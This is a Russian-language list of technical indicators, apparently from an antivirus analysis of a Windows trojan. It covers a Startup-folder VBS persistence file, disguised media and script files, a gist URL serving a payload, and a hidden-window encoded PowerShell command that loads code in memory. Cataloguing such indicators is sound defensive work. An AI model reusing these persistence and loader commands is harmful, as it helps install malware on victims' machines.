Техническая информация
- %APPDATA%\microsoft\windows\start menu\programs\startup\system33.vbs
- %WINDIR%\serviceprofiles\localservice\appdata\roaming\microsoft\upnp device host\upnphost\udhisapi.dll
- https://gist.githubusercontent.com/alheany77/8edb53bb9913842925abb4d86dd0d00d/raw/79190c41ee268a9069b7f339e61cf02b67ae5ffe/vid.txt
- <LS_APPDATA>\jemfb3oalvv.mp4
- <LS_APPDATA>\jemfb3oplay.vbs
- '23#.#55.255.250':1900
- ClassName: '\MSITPro::EventQueue' WindowName: ''
- ClassName: 'Type32_Main_Window' WindowName: ''
- ClassName: 'WMPlayerApp' WindowName: ''
- '<SYSTEM32>\wscript.exe' "<LS_APPDATA>\JEmfB3oplay.vbs"
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -noP -sta -w 1 -enc WwBBAHAAcABEAG8AbQBhAGkAbgBdADoAOgBDAHUAcgByAGUAbgB0AEQAbwBtAGEAaQBuAC4ATABvAGEAZAAoAFsAQwBvAG4AdgBlAHIAdABdADoAOgBGAHIAbwBtAGIAYQBzAGUANgA0AFMAdAByAGkAbgBnACgAKABOAGUAdwAt...' (со скрытым окном)
- '%ProgramFiles(x86)%\windows media player\wmplayer.exe' /Play -Embedding